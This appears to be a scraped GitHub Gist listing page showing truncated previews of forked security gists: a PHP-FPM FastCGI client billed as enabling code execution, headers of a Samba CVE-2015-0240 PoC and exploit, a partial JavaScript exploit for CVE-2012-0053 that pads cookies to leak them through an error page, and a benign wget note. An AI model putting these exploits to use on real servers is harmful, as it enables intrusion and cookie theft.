scopion
scopion
/ fpm.py
Created
January 14, 2019 09:22
— forked from phith0n/fpm.py
Fastcgi PHP-FPM Client && Code Execution
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import socket | |
| import random | |
| import argparse | |
| import sys | |
| from io import BytesIO | |
| # Referrer: https://github.com/wuyunfeng/Python-FastCGI-Client | |
| PY2 = True if sys.version_info.major == 2 else False |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # 使用 wget 下载整个网站解释 | |
| # link: https://www.douban.com/note/536265958 | |
| # wget | |
| # --recursive //回归递推也就是包括所有子目录子文件 | |
| # --no-clobber //不更改已经存在的文件,也不使用在文件名后添加 .#(# 为数字)的方法写入新的文件 | |
| # --page-requisites //下载所有显示完整网页所需的文件,例如图像。 | |
| # --html-extension //将所有text/html文档以.html扩展名保存 | |
| # --convert-links //转换非相对链接为相对链接 | |
| # --no-parent //不要追溯到父目录 | |
| # --level=0 // Specify recursion maximum depth level depth. |
scopion
/ cve-2015-0240_samba_poc.py
Created
October 10, 2018 02:08
— forked from worawit/cve-2015-0240_samba_poc
PoC for Samba vulnerabilty (CVE-2015-0240)
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/python | |
| """ | |
| PoC for Samba vulnerabilty (CVE-2015-0240) by sleepya | |
| This PoC does only triggering the bug | |
| Reference: | |
| - https://securityblog.redhat.com/2015/02/23/samba-vulnerability-cve-2015-0240/ | |
| ################# | |
| Exploitability against CentOS/Ubuntu binaries |
scopion
/ cve-2015-0240_samba_exploit.py
Created
October 10, 2018 02:05
— forked from worawit/cve-2015-0240_samba_exploit.py
Exploit for Samba vulnerabilty (CVE-2015-0240)
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/python | |
| """ | |
| Exploit for Samba vulnerabilty (CVE-2015-0240) by sleepya | |
| The exploit only targets vulnerable x86 smbd <3.6.24 which 'creds' is controlled by | |
| ReferentID field of PrimaryName (ServerName). That means '_talloc_zero()' | |
| in libtalloc does not write a value on 'creds' address. | |
| Reference: | |
| - https://securityblog.redhat.com/2015/02/23/samba-vulnerability-cve-2015-0240/ |
scopion
/ CVE-2012-0053.js
Created
September 27, 2018 07:27
— forked from sbehrens/CVE-2012-0053.js
CVE-2012-0053 Exploit
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| (function(d){ | |
| desired_length = 8192; | |
| for(cookie_val = '=';cookie_val.length<=97;cookie_val+="A"){}; | |
| for(i=100;(desired_length-d.cookie.length)>111;i++,d.cookie=i+cookie_val){}; | |
| for(cookie_val="999=";(cookie_val.length + d.cookie.length + 9) <= desired_length;cookie_val += "A"){}; | |
| d.cookie = cookie_val; | |
| d.cookie = "888=8"; | |
| x = new XMLHttpRequest(); | |
| x.onreadystatechange = function(){ | |
| if (x.readyState == 4 && x.status == 400){ |